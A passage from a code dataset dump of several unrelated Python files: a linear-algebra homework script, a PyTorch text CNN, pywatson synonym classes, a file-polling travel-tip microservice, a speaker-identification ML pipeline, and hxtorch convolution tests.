6, 7, 2, 3, 1, 4, 8])\r\np4 = (p1**15)*(p2**(-1))\r\np4 = p4**185\r\nx = (p4**(-1))*p3\r\n\r\nprint(\"2 задание:\\nx = \")\r\nprint(x)\r\nprint()\r\n\r\nprint(\"3 задание:\")\r\np = Permutation(list(range(6,186))+list(range(1,6)))\r\npe = p.evnss()\r\nprint(pe)\r\nif pe == 0:\r\n print(\"чётная\")\r\nelse:\r\n print(\"нечётная\")\r\nprint()\r\n\r\nfrom LinAlgFuncs import *\r\nfrom mySybolicCalcs import *\r\n\r\nx = Variable(\"x\")\r\n\r\nm = tensor_from_iterable([\r\n [0,x,0,6,0,0],\r\n [4,0,9,7,0,1],\r\n [x,9,x,x,0,7],\r\n [0,9,3,0,8,2],\r\n [0,x,x,4,7,8],\r\n [0,5,4,4,8,7]\r\n])\r\n\r\nprint(\"задание 4:\\ndet(m) =\", det_by_minors(m))","repo_name":"Vsevolod-pl/LinAlg","sub_path":"DZ2.py","file_name":"DZ2.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"18565350264","text":"#!/usr/bin/env python\n\n\"\"\"cnn: a PyTorch implementation of vanilla CNN. \"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n__author__ = \"Yandi Xia\"\n\nCONFIG = {\n \"filter_sizes\": [3],\n \"num_filters\": 250,\n \"vocab_size\": None,\n \"emb_dim\": 300,\n \"hid_sizes\": [250],\n \"num_classes\": None,\n \"dropout_switches\": [True]\n}\n\n\nclass Net(nn.Module):\n \"\"\"A vanilla CNN model\"\"\"\n\n def __init__(self):\n for arg in CONFIG:\n self.__setattr__(arg, CONFIG[arg])\n assert len(self.hid_sizes) == len(self.dropout_switches)\n super(Net, self).__init__()\n self.lookup_table = nn.Embedding(self.vocab_size, self.emb_dim)\n self.init_embedding()\n self.encoders = []\n for i, filter_size in enumerate(self.filter_sizes):\n enc_attr_name = \"encoder_%d\" % i\n self.__setattr__(enc_attr_name,\n nn.Conv2d(in_channels=1,\n out_channels=self.num_filters,\n kernel_size=(filter_size, self.emb_dim)))\n self.encoders.append(self.__getattr__(enc_attr_name))\n self.hid_layers = []\n ins = len(self.filter_sizes) * self.num_filters\n for i, hid_size in enumerate(self.hid_sizes):\n hid_attr_name = \"hid_layer_%d\" % i\n self.__setattr__(hid_attr_name, nn.Linear(ins, hid_size))\n self.hid_layers.append(self.__getattr__(hid_attr_name))\n ins = hid_size\n self.logistic = nn.Linear(ins, self.num_classes)\n\n def forward(self, x):\n \"\"\"\n :param x:\n input x is in size of [N, C, H, W]\n N: batch size\n C: number of channel, in text case, this is 1\n H: height, in text case, this is the length of the text\n W: width, in text case, this is the dimension of the embedding\n :return:\n a tensor [N, L], where L is the number of classes\n \"\"\"\n n_idx = 0\n c_idx = 1\n h_idx = 2\n w_idx = 3\n # lookup table output size [N, H, W=emb_dim]\n x = self.lookup_table(x)\n # expand x to [N, 1, H, W=emb_dim]\n x = x.unsqueeze(c_idx)\n enc_outs = []\n for encoder in self.encoders:\n enc_ = F.relu(encoder(x))\n k_h = enc_.size()[h_idx]\n k_w = 1\n enc_ = F.max_pool2d(enc_, kernel_size=(k_h, k_w))\n enc_ = enc_.squeeze(w_idx)\n enc_ = enc_.squeeze(h_idx)\n enc_outs.append(enc_)\n # each of enc_outs size [N, C]\n encoding = torch.cat(enc_outs, 1)\n hid_in = encoding\n for hid_layer, do_dropout in zip(self.hid_layers, self.dropout_switches):\n hid_out = F.relu(hid_layer(hid_in))\n if do_dropout:\n hid_out = F.dropout(hid_out, training=self.training)\n hid_in = hid_out\n pred_prob = F.log_softmax(self.logistic(hid_in))\n return pred_prob\n\n def init_embedding(self):\n initrange = 0.1\n self.lookup_table.weight.data.uniform_(-initrange, initrange)\n","repo_name":"xiayandi/Pytorch_text_classification","sub_path":"cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"27"} +{"seq_id":"25646377224","text":"from pywatson.util.map_initializable import MapInitializable\n\n\nclass SynSetSynonym(MapInitializable):\n def __init__(self, is_chosen, value, weight):\n self.is_chosen = is_chosen\n self.value = value\n self.weight = weight\n\n @classmethod\n def from_mapping(cls, syn_mapping):\n return cls(is_chosen=syn_mapping['isChosen'],\n value=syn_mapping['value'],\n weight=syn_mapping['weight'])\n\n\nclass SynSet(MapInitializable):\n def __init__(self, name, synonyms=()):\n self.name = name\n self.synonyms = tuple(synonyms)\n\n @classmethod\n def from_mapping(cls, synset_mapping):\n return cls(name=synset_mapping[0]['name'],\n synonyms=(SynSetSynonym.from_mapping(s) for s in synset_mapping[0]['synonym']))\n\n\nclass Synonym(MapInitializable):\n def __init__(self, part_of_speech, lemma, value, syn_set):\n self.part_of_speech = part_of_speech\n self.lemma = lemma\n self.value = value\n self.syn_set = syn_set\n\n @classmethod\n def from_mapping(cls, synonym_mapping):\n return cls(part_of_speech=synonym_mapping['partOfSpeech'],\n lemma=synonym_mapping['lemma'],\n value=synonym_mapping['value'],\n syn_set=SynSet.from_mapping(synonym_mapping['synSet']))\n","repo_name":"unhaltable/pywatson","sub_path":"pywatson/answer/synonym.py","file_name":"synonym.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"27"} +{"seq_id":"22578897513","text":"# much of this code was inspired by my microservice code from the first microservice assignment\r\n\r\nimport time\r\n\r\ncount = 0\r\ntips = [\r\n \"Wake up early to avoid crowds at sites and attractions.\",\r\n \"Learn a few key phrases in the local language to be able to communicate with people.\",\r\n \"Always pack a towel.\",\r\n \"Do some research before-hand; don't miss out on opportunities due to lack of planning!\",\r\n \"Always be willing to change plans if a new experience comes along!\"\r\n]\r\n\r\nwhile True:\r\n time.sleep(1)\r\n val = 'null'\r\n with open('travel-tip-service.txt', 'r', encoding='utf-8') as tipFile:\r\n val = tipFile.read()\r\n tipFile.close()\r\n\r\n if val == 'tip':\r\n with open('travel-tip-service.txt', 'w', encoding='utf-8') as tipFile:\r\n val = tips[count % 5]\r\n count += 1\r\n tipFile.write(val)\r\n tipFile.close()\r\n\r\n\r\n","repo_name":"stmii/CS361_Microservice","sub_path":"travel-tip.py","file_name":"travel-tip.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"39631628149","text":"# -*- coding: utf-8 -*-\n\"\"\"Speaker Identification\n\n\"\"\"\n\nimport numpy as np\nfrom numpy import loadtxt, array, array, vstack, mean, std\nfrom numpy.linalg import lstsq\nimport pandas as pd\nimport seaborn as sns\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import rgb2hex\nfrom matplotlib.cm import get_cmap\nimport matplotlib as mat\nfrom mpl_toolkits.mplot3d import Axes3D\n\nfrom sklearn.model_selection import cross_val_score, cross_val_predict, GridSearchCV\nfrom sklearn.utils import resample\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.svm import SVC\nfrom sklearn import svm\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import metrics\n\nfrom keras.models import Sequential, load_model\nfrom keras.utils import to_categorical\nfrom keras.layers import (Dense, LSTM, Dropout)\nfrom keras_preprocessing.sequence import pad_sequences\n\nclass Utils():\n def __init__(self):\n pass\n\n def read_file(self, block_file, block_label_file=None, file_type='train'):\n if file_type == 'train':\n '''\n Read data from txt file into time series blocks (sequences)\n '''\n block_label_index = loadtxt(block_label_file, delimiter=\" \").tolist()\n file = open(block_file, \"r\")\n speaker_index = 0\n block_index = 0\n block = list()\n blocks = list()\n labels = list()\n for line in file.readlines():\n if line == '\\n':\n label = list()\n blocks.append(block)\n label.append(speaker_index)\n labels.append(label)\n block_index += 1\n block = list()\n if speaker_index <= 8 and block_index == block_label_index[speaker_index]:\n speaker_index += 1\n block_index = 0\n else:\n point_in_time = list()\n line = line.strip('\\n')\n for x in line.split(' ')[:12]:\n point_in_time.append(float(x))\n block.append(point_in_time)\n return blocks, labels\n else:\n '''\n Read test data from the file and store into time series blocks\n '''\n file = open(block_file, \"r\")\n speaker_index = 0\n block_index = 0\n block = list()\n blocks = list()\n for line in file.readlines():\n if line == '\\n':\n blocks.append(block)\n block_index += 1\n block = list()\n else:\n point_in_time = list()\n line = line.strip('\\n')\n for x in line.split(' ')[:12]:\n point_in_time.append(float(x))\n block.append(point_in_time)\n return blocks\n\n def pad_to_fixed_size_blocks(self, data_block, max_length, final_block_size):\n '''\n First pad last row till max length, then truncate it to fixed length size\n '''\n # Padding the sequence with the values in last row to max length\n fixed_size_block = []\n for block in data_block:\n block_len = len(block)\n last_row = block[-1]\n n = max_length - block_len\n\n to_pad = np.repeat(block[-1], n).reshape(12, n).transpose()\n new_block = np.concatenate([block, to_pad])\n fixed_size_block.append(new_block)\n\n final_dataset = np.stack(fixed_size_block)\n\n # truncate the sequence to final_block_size\n final_dataset = pad_sequences(final_dataset, maxlen=final_block_size, padding='post', dtype='float', truncating='post')\n\n return final_dataset\n\n def convert_to_vectors(self, data_block, block_label, final_block_size):\n '''\n Convert fixed size block to feature vectors for ML algorithms\n '''\n block_label = [i[0] for i in block_label]\n # print(block_label)\n vectors = list()\n n_features = 12\n for i in range(len(data_block)):\n block = data_block[i]\n vector = list()\n for row in range(1, final_block_size+1):\n for col in range(n_features):\n vector.append(block[-row, col])\n\n vector.append(block_label[i])\n vectors.append(vector)\n vectors = array(vectors)\n vectors =vectors.astype('float32')\n return vectors\n \n def balance_classes(self, train_data):\n '''\n Balance the train data\n '''\n speaker_0 = train_data[train_data[:,-1] == 0]\n speaker_4 = train_data[train_data[:,-1] == 4]\n speaker_1 = train_data[train_data[:,-1] == 1]\n speaker_5 = train_data[train_data[:,-1] == 5]\n speaker_8 = train_data[train_data[:,-1] == 8]\n others = train_data[np.logical_or.reduce((train_data[:,-1] == 2, train_data[:,-1] == 3, train_data[:,-1] == 6, train_data[:,-1] == 7))]\n\n upsample_0 = resample(speaker_0, replace=True, n_samples=40, random_state=123)\n upsample_1 = resample(speaker_1, replace=True, n_samples=40, random_state=123)\n upsample_4 = resample(speaker_4, replace=True, n_samples=40, random_state=123)\n upsample_5 = resample(speaker_5, replace=True, n_samples=40, random_state=123)\n upsample_8 = resample(speaker_8, replace=True, n_samples=40, random_state=123)\n\n args = (others, upsample_0, upsample_1, upsample_4, upsample_5, upsample_8)\n balanced_train_data = np.concatenate(args)\n\n return balanced_train_data\n\nclass DisplayUtils():\n def display_lpc_distribution(self, train_blocks):\n '''\n Visualize all 12 lpc coefficients distribution over all blocks\n '''\n point_in_time = vstack(train_blocks)\n plt.figure(figsize=(10, 25))\n plt.title('LPC coefficients Distribution')\n coefficients = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]\n for c in coefficients:\n plt.subplot(len(coefficients), 1, c + 1)\n plt.hist(point_in_time[:, c], bins=100)\n plt.savefig('lpc_coeff_dist.png')\n plt.show()\n\n def display_block_length_distribution(self, train_blocks):\n '''\n visualize the distribution of block length\n '''\n points_in_time = [len(x) for x in train_blocks]\n plt.title('Block Length Distribution')\n plt.hist(points_in_time, bins=25)\n plt.savefig('block_len_dist.png')\n plt.show()\n\n def lpc_scatter_plot(self, final_train_data):\n '''\n use scatter plot to visualize the grouping of users\n '''\n train_X, train_y = final_train_data[:, :-1], final_train_data[:, -1]\n colormap = get_cmap('viridis')\n colors = [rgb2hex(colormap(col)) for col in np.arange(0, 1.01, 1 / (6 - 1))]\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n ax = Axes3D(fig)\n ax.scatter(train_X[:, 0], train_X[:, 1], train_X[:, 2], c=train_y, s=50, cmap=mat.colors.ListedColormap(colors))\n plt.title('Speaker Plot')\n plt.savefig('scatter_plot.png')\n plt.show()\n\n def display_lpc_time_series(self, speaker_blocks):\n '''\n visualize a block of lpc series for each speaker\n '''\n # group sequences by speaker\n speakers = [i + 1 for i in range(0,9)]\n speakers_voice = {}\n for speaker in speakers:\n speakers_voice[speaker] = [speaker_blocks[j] for j in range(len(speakers)) if speakers[j] == speaker]\n plt.figure(figsize=(10, 35))\n plt.title('LPC trend for each speaker')\n for i in speakers:\n plt.subplot(len(speakers), 1, i)\n coeff_series = vstack(speakers_voice[i][0])\n for j in [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]:\n plt.plot(coeff_series[:, j], label='test')\n plt.title('Speaker ' + str(i), y=0, loc='left')\n plt.savefig('lpc_series.png')\n plt.show()\n\n def regress(self, y):\n X = array([i for i in range(len(y))]).reshape(len(y), 1)\n b = lstsq(X, y)[0][0]\n yhat = b * X[:, 0]\n return yhat\n\n def display_fitted_lpc_series(self, speaker_blocks):\n '''\n visualize a fitted lpc series for each speaker to see the trend\n '''\n speakers = [i + 1 for i in range(0,9)]\n speakers_voice = {}\n for speaker in speakers:\n speakers_voice[speaker] = [speaker_blocks[j] for j in range(len(speakers)) if speakers[j] == speaker]\n plt.figure(figsize=(10, 25))\n plt.title('LPC trend for each speaker')\n for i in speakers:\n plt.subplot(len(speakers), 1, i)\n coeff_series = vstack(speakers_voice[i][0])\n plt.plot(coeff_series[:, i])\n plt.plot(self.regress(coeff_series[:, i]))\n plt.title('Speaker ' + str(i), y=0, loc='left')\n plt.savefig('fitted_lpc_series.png')\n plt.show()\n\n def show_training_history(self, history):\n '''\n Show LSTM model training loss over each epoch\n '''\n plt.figure(figsize=(8, 6))\n plt.plot(history.history['loss'])\n plt.title('LSTM model training loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.savefig('lstm_train_error.png')\n plt.show()\n \n def display_class_distribution(self, train_block_label, disp_type=\"orginal\"):\n '''\n Show the class distribution\n '''\n unique, counts = np.unique(train_block_label, return_counts=True)\n label_counts = dict(zip(unique, counts))\n plt.figure(figsize=(10,6))\n sns.barplot(x = unique, y = counts)\n plt.title('Class distribution ('+disp_type+')')\n plt.xlabel('Class')\n plt.ylabel('Count')\n plt.savefig(disp_type+'class_distribution.png')\n plt.show()\n\nclass Models():\n def __init__(self):\n pass\n\n # Function to print result of the classifier\n def print_result(self, y_test, y_pred):\n '''\n print classification result (on train set)\n '''\n print(\"\\n\\n\")\n print(metrics.classification_report(y_test, y_pred))\n print(\"Confusion Matrix: \\n\\n\", metrics.confusion_matrix(y_test, y_pred))\n\n def save_prediction(self, test_X, predict, file_name):\n '''\n save prediction to the csv file\n '''\n predictions = []\n for block in range(0, len(test_X)):\n predictions.append([block,int(predict[block])])\n submission = pd.DataFrame(predictions, columns=['block_num', 'prediction'])\n submission.to_csv(file_name, header=['block_num','prediction'], index=None, sep=',')\n\n def build_train_lstm_model(self, trainX, trainy):\n '''\n build lstm model and train\n '''\n trainy = to_categorical(trainy)\n verbose, epochs, batch_size = 2, 150, 64\n n_timesteps, n_features, n_outputs = trainX.shape[1], trainX.shape[2], trainy.shape[1]\n model = Sequential()\n model.add(LSTM(100, input_shape=(n_timesteps, n_features)))\n model.add(Dropout(0.5))\n model.add(Dense(100, activation='relu'))\n model.add(Dense(n_outputs, activation='softmax'))\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n # fit network\n history = model.fit(trainX, trainy, epochs=epochs, batch_size=batch_size, verbose=verbose)\n model.save('lstm_model.h5')\n return history\n\n def lstm_predict(self, testX):\n '''\n load the saved model and predict the class for test data\n '''\n model = load_model('lstm_model.h5')\n predict_classes = []\n for pred in model.predict(testX):\n predict_classes.append(np.argmax(pred))\n\n return np.array(predict_classes)\n\n def compare_ml_models(self, train_X, train_y, nfold):\n '''\n Initial experimentation on several algorithms\n '''\n models, names = list(), list()\n # knn\n models.append(KNeighborsClassifier())\n names.append('KNN')\n # logistic\n models.append(LogisticRegression(solver='lbfgs', multi_class='auto', max_iter=200))\n names.append('LR')\n # cart\n models.append(DecisionTreeClassifier())\n names.append('CART')\n # svm\n models.append(SVC())\n names.append('SVM')\n # random forest\n models.append(RandomForestClassifier(n_estimators=100))\n names.append('RF')\n # evaluate models\n\n all_scores = list()\n for i in range(len(models)):\n s = StandardScaler()\n p = Pipeline(steps=[('s', s), ('m', models[i])])\n scores = cross_val_score(p, train_X, train_y, scoring='accuracy', cv=nfold, n_jobs=-1)\n all_scores.append(scores)\n m, s = mean(scores) * 100, std(scores) * 100\n print('%s %.3f%% +/-%.3f' % (names[i], m, s))\n\n return all_scores, names\n\n def svm_parameter_tuning(self, train_X, train_y, nfold):\n '''\n find best parameter for svm\n '''\n param_grid = {'C': [0.001, 0.01, 0.1, 1, 10], 'gamma': [0.001, 0.01, 0.1, 1], 'kernel':['rbf','linear']}\n grid_search = GridSearchCV(svm.SVC(), param_grid, cv=nfold, verbose=1)\n grid_search.fit(train_X, train_y)\n grid_search.best_params_\n\n scores = cross_val_score(grid_search.best_estimator_, train_X, train_y, scoring='accuracy', cv=nfold, n_jobs=-1)\n m, s = mean(scores) * 100, std(scores) * 100\n print('%s %.3f%% +/-%.3f' % ('SVM fine tuned', m, s))\n\n\n return grid_search.best_params_, grid_search.best_estimator_\n\n\n \n\n def test_best_model(self, best_estimator, train_X, train_y):\n '''\n Test the best model\n '''\n y_pred = cross_val_predict(best_estimator, train_X, train_y, cv=5)\n print(\"Performance by SVM (with best estimator) in test data using cross-val...\\n\\n\")\n self.print_result(train_y, y_pred)\n\n def classify_test_data(self, best_estimator, train_X, train_y, test_X):\n '''\n Classify test data using best svm settings\n '''\n best_estimator.fit(train_X, train_y)\n predict = best_estimator.predict(test_X)\n return predict\n\n def run_classification_models(self, train_data, test_data):\n '''\n use traditional machine learning approach\n '''\n train_X, train_y = train_data[:,:-1], train_data[:,-1]\n test_X, test_y = test_data[:, :-1], test_data[:, -1]\n nfold = 5\n\n print(\"Running Algorithms for Spot Checking ... \\n\\n\")\n all_scores, names = self.compare_ml_models(train_X, train_y, nfold)\n\n # # Visualize boxplot to see the best model\n plt.boxplot(all_scores, labels=names)\n # pyplot.show()\n plt.savefig('spot_check_box_plot.png')\n\n # Since SVM shows the best performance.. Let's tune the parameter for SVM and find the best model\n print(\"Running Grid Search for the Best Algorithm (SVM) ... \\n\\n\")\n best_param, best_estimator = self.svm_parameter_tuning(train_X, train_y, nfold)\n print(\"Best Parameters: \", best_param)\n print(\"\\n\\nBest Estimators: \", best_estimator)\n\n # test the performance of best svm model\n self.test_best_model(best_estimator, train_X, train_y)\n print(\"Predicting Speakers.....\\n\\n\")\n #predict the speaker for test data using best svm model\n predict = self.classify_test_data(best_estimator, train_X, train_y, test_X)\n self.save_prediction(test_X, predict, 'submission.csv')\n\n def run_LSTM_model(self, trainX, trainy, testX):\n '''\n use lstm based classifer for speaker classification\n '''\n # build and train LSTM Model\n print(\"\\n\\nTraining LSTM....\\n\\n\")\n history = self.build_train_lstm_model(trainX, trainy)\n\n # visualize the training error and convergence of LSTM\n display = DisplayUtils()\n display.show_training_history(history)\n\n #predict the speaker using\n predict = self.lstm_predict(testX)\n self.save_prediction(testX, predict, 'submission_lstm.csv')\n\nutils = Utils()\n\ntrain_data = 'train.txt'\ntest_data = 'test.txt'\ntrain_label = 'train_block_labels.txt'\n\n# load data\nprint(\"Loading Data\\n\\n\")\ntrain_block, train_block_label = utils.read_file(block_file = train_data, block_label_file = train_label, file_type='train')\ntest_block = utils.read_file(block_file = test_data, file_type='test')\n\n# explore data, do some visualization\nprint(\"Exploring Data\\n\\n\")\ndisplay = DisplayUtils()\n\n# histogram for the lpc coefficient distribution\ndisplay.display_lpc_distribution(train_block)\n\n# histogram for the block length (or point of time) distribution\ndisplay.display_block_length_distribution(train_block)\n\n# plot one block of lpc coefficient for each speaker to look at the pattern of voice frequency\ndisplay.display_lpc_time_series(train_block)\ndisplay.display_fitted_lpc_series(train_block)\n\nmax_length = 29\nfinal_block_size = 18\n\nprint(\"Data Preprocessing (padding to fixed size blocks)\\n\\n\")\n# Take the best lengths (18), truncate the longer block, and pad the shorter block by the last row\ntrain_data = utils.pad_to_fixed_size_blocks(train_block, max_length, final_block_size)\ntest_data = utils.pad_to_fixed_size_blocks(test_block, max_length, final_block_size)\n\n# dummy test label for convenience\ntest_block_label = [[i] for i in np.zeros(len(test_data))]\n\nprint(\"Generating Features (for ML Algorithms)\\n\\n\")\n\n# Generate fixed length feature vector for traditional machine learning input\nfinal_train_data = utils.convert_to_vectors(train_data, train_block_label, final_block_size)\nfinal_test_data = utils.convert_to_vectors(test_data, test_block_label, final_block_size)\n\n\n# Class distribution before balancing\ndisplay.display_class_distribution(final_train_data[:,-1], disp_type='orginal')\n\n\nprint(\"Before balancing\")\nmodel = Models()\nmodel.run_classification_models(final_train_data, final_test_data)\n\n# Balancing the classes for training\nfinal_train_data = utils.balance_classes(final_train_data)\n\n# Class distribution after balancing\ndisplay.display_class_distribution(final_train_data[:,-1], disp_type='balanced')\n\n# Scatter plot to figure if there is any grouping based on feature vector\ndisplay.lpc_scatter_plot(final_train_data)\n\n# It appears that there is clustering, so classifying with few algorithms\nmodel = Models()\nmodel.run_classification_models(final_train_data, final_test_data)\n\nprint(\"SVM Prediction Saved (see 'submission.csv' )\\n\\n\")\n\n# Also try LSTM for classification\nmodel.run_LSTM_model(np.array(train_data), np.array(train_block_label), np.array(test_data))\nprint(\"LSTM Prediction Saved (see 'submission_lstm.csv' )\\n\\n\")","repo_name":"5Isha6/Speech-Identification","sub_path":"speaker_identification.py","file_name":"speaker_identification.py","file_ext":"py","file_size_in_byte":18601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71459577352","text":"from abc import ABC, abstractmethod\nfrom collections import namedtuple\nfrom functools import partial\nfrom typing import ClassVar, Dict\nimport math\nimport unittest\nimport torch\nimport hxtorch\nfrom hxtorch import logger\n\nfrom hxtorch_shared_test_tools import rand_full\n\nlogger.default_config(level=logger.LogLevel.INFO)\nlogger.set_loglevel(logger.get(\"grenade\"), logger.LogLevel.WARN)\n\n\nclass ConvInput(namedtuple('ConvInput', [\"input\", \"weight\", \"bias\", \"stride\"],\n defaults=[None, 1])):\n \"\"\"\n An input to a convolution operation.\n \"\"\"\n def duplicate(self):\n return self._make(arg.data.clone().requires_grad_()\n if hasattr(arg, \"requires_grad\") else arg\n for arg in self)\n\n\nclass TestConv(ABC, unittest.TestCase):\n \"\"\"\n Tests a conv operation.\n \"\"\"\n gain: ClassVar[float] = 1.\n\n @abstractmethod\n def conv(**kwargs):\n raise NotImplementedError\n\n @abstractmethod\n def torch_conv(**kwargs):\n raise NotImplementedError\n\n test_inputs: ClassVar[Dict[str, ConvInput]]\n\n def test_output_shape_gradient(self):\n \"\"\"\n Compares the output shape and gradients of the operation to the output\n of the torch implementation for different input arguments.\n \"\"\"\n log = hxtorch.logger.get(self.__class__.__name__)\n\n for mode in self.test_inputs:\n with self.subTest(mode=mode):\n conv_input = self.test_inputs[mode].duplicate()\n result = self.conv(**conv_input._asdict())\n log.info(f\"Mean output: {result.mean():.1f}\")\n\n self.assertTrue(result.is_contiguous())\n\n conv_input_torch = conv_input.duplicate()\n result_torch = self.torch_conv(**conv_input_torch._asdict())\n self.assertEqual(result.size(), result_torch.size())\n\n # compute gradients\n result.backward(torch.ones_like(result))\n result_torch.backward(torch.ones_like(result_torch))\n\n for name, arg in conv_input._asdict().items():\n if hasattr(arg, \"grad\"):\n grad = arg.grad\n grad_torch = getattr(conv_input_torch, name).grad\n if name != \"bias\":\n grad_torch *= self.gain\n self.assertTrue(\n torch.allclose(grad, grad_torch, rtol=.001),\n f\"{name.capitalize()} gradient does not match:\\n\"\n f\"{grad}\\n!=\\n{grad_torch}\"\n f\"\\ndiff:\\n{grad - grad_torch}\")\n\n\nclass TestConv1d(TestConv):\n \"\"\"\n Tests the conv1d operation.\n \"\"\"\n\n conv = torch.conv1d\n torch_conv = torch.conv1d\n\n test_inputs = {\n \"batch1_outchannels1_inchannels1_kernel_larger_stride\":\n ConvInput(rand_full((3, 1, 30), 25.), rand_full((1, 1, 5), 50.),\n stride=7),\n \"expanded_full_synram\":\n ConvInput(rand_full((2, 1, 128), 10.), rand_full((14, 1, 43), 15.),\n bias=torch.full((14,), 1.).requires_grad_(), stride=5),\n \"expanded_overfull_synram\":\n ConvInput(rand_full((2, 1, 138), 10.), rand_full((14, 1, 43), 15.),\n bias=torch.full((14,), 1.).requires_grad_(), stride=5),\n }\n\n kernel_size = 5\n for n_batches in [2, 4]:\n for n_input_channels in [1, 3, 5]:\n for n_output_channels in [1, 4]:\n for stride in [7, 4, 2]:\n test_inputs.update({\n f\"batch{n_batches}_outchannels{n_output_channels}_\"\n + f\"inchannels{n_input_channels}_kernel{kernel_size}_\"\n + f\"stride{stride}\": ConvInput(\n rand_full((n_batches, n_input_channels, 30), 10.),\n rand_full((n_output_channels, n_input_channels,\n kernel_size), 50.),\n stride=stride)})\n\n\nclass TestConv1dHX(TestConv1d):\n \"\"\"\n Tests the conv1d operation on HX.\n \"\"\"\n conv = hxtorch.perceptron.conv1d\n\n @classmethod\n def setUpClass(cls):\n hxtorch.init_hardware(ann=True)\n mock_parameter = hxtorch.perceptron.measure_mock_parameter()\n hxtorch.perceptron.set_mock_parameter(mock_parameter)\n cls.gain = mock_parameter.gain\n\n @classmethod\n def tearDownClass(cls):\n hxtorch.release_hardware()\n\n\nclass TestConv1dHXmock(TestConv1d):\n \"\"\"\n Tests the mocked conv1d operation.\n \"\"\"\n conv = partial(hxtorch.perceptron.conv1d, mock=True)\n\n @classmethod\n def setUpClass(cls):\n mock_parameter = hxtorch.perceptron.MockParameter()\n hxtorch.perceptron.set_mock_parameter(mock_parameter)\n cls.gain = mock_parameter.gain\n\n\nclass TestExpandedConv1d(TestConv1d):\n \"\"\"\n Tests the conv1d operation.\n\n :cvar num_expansions: Number of expansions of the conv1d operation.\n Number of times the convolution kernel is placed side by side\n in the synapse matrix, shifted by the convolution's stride.\n \"\"\"\n\n num_expansions = 18\n conv = partial(\n hxtorch.perceptron.expanded_conv1d, num_expansions=num_expansions,\n num_sends=4, mock=True)\n\n @classmethod\n def setUpClass(cls):\n mock_parameter = hxtorch.perceptron.MockParameter(gain=0.0015, noise_std=0)\n hxtorch.perceptron.set_mock_parameter(mock_parameter)\n cls.gain = mock_parameter.gain * 4\n\n def test_compare_outputs(self):\n \"\"\"\n Compares the outputs of the expanded conv1d operation to the outputs\n of the normal conv1d operation.\n \"\"\"\n for mode in self.test_inputs:\n with self.subTest(mode=mode):\n conv_input = self.test_inputs[mode].duplicate()\n result_expanded = self.conv(**conv_input._asdict())\n result = hxtorch.perceptron.conv1d(\n num_sends=4, mock=True, **conv_input._asdict())\n\n # calculate how many synrams are filled with the given\n # operation, each will run as its own MAC operation and\n # will result in a rounding error up to 1.\n\n # size limitation in terms of height, caused by inputs:\n n_input_channels = self.test_inputs[mode].input.size()[1]\n kernel_size = self.test_inputs[mode].weight.size()[2]\n stride = self.test_inputs[mode].stride\n\n n_synapse_matrices = math.ceil(\n ((n_input_channels * stride * self.num_expansions)\n + kernel_size) / hxtorch.perceptron.constants.hardware_matrix_height)\n\n # size limitation in terms of width, caused by outputs:\n n_output_channels = self.test_inputs[mode].weight.size()[0]\n n_synapse_matrices = max(\n n_synapse_matrices,\n math.ceil(n_output_channels\n / hxtorch.perceptron.constants.hardware_matrix_width))\n\n self.assertTrue(\n torch.allclose(result_expanded, result,\n atol=n_synapse_matrices),\n \"Results do not match:\\n\"\n f\"{result_expanded}\\n!=\\n{result}\")\n\n\nclass TestConv2d(TestConv):\n \"\"\"\n Tests the conv2d operation.\n \"\"\"\n conv = torch.conv2d\n torch_conv = torch.conv2d\n\n test_inputs = {\n \"batch1_outchannels1_inchannels1_kernel_larger_stride\":\n ConvInput(rand_full((1, 1, 30, 60), 25.), rand_full((1, 1, 5, 10), 20),\n stride=(7, 14)),\n \"batch2_outchannels1_inchannels3_kernel_larger_stride\":\n ConvInput(rand_full((2, 3, 30, 60), 10.), rand_full((1, 3, 5, 10), 20),\n stride=(7, 14)),\n \"batch2_outchannels4_inchannels3_kernel_larger_stride\":\n ConvInput(rand_full((2, 3, 30, 60), 10.), rand_full((4, 3, 5, 10), 20),\n stride=(7, 14)),\n \"batch1_outchannels1_inchannels1_kernel_smaller_stride\":\n ConvInput(rand_full((1, 1, 30, 60), 25.), rand_full((1, 1, 5, 10), 20),\n stride=(4, 8)),\n \"batch2_outchannels1_inchannels3_kernel_smaller_stride\":\n ConvInput(rand_full((2, 3, 30, 60), 10.), rand_full((1, 3, 5, 10), 20),\n stride=(4, 8)),\n \"batch2_outchannels4_inchannels3_kernel_smaller_stride\":\n ConvInput(rand_full((2, 3, 30, 60), 10.), rand_full((4, 3, 5, 10), 20),\n stride=(4, 8)),\n \"batch2_outchannels4_inchannels3_kernel_smaller_stride\":\n ConvInput(rand_full((2, 3, 30, 60), 10.), rand_full((4, 3, 5, 10), 20),\n bias=torch.full((4,), 0.).requires_grad_(), stride=(4, 8))\n }\n\n\nclass TestConv2dHX(TestConv2d):\n \"\"\"\n Tests the conv2d operation on HX.\n \"\"\"\n conv = hxtorch.perceptron.conv2d\n\n @classmethod\n def setUpClass(cls):\n hxtorch.init_hardware()\n mock_parameter = hxtorch.perceptron.measure_mock_parameter()\n hxtorch.perceptron.set_mock_parameter(mock_parameter)\n cls.gain = mock_parameter.gain\n\n @classmethod\n def tearDownClass(cls):\n hxtorch.release_hardware()\n\n\nclass TestConv2dHXmock(TestConv2d):\n \"\"\"\n Tests the 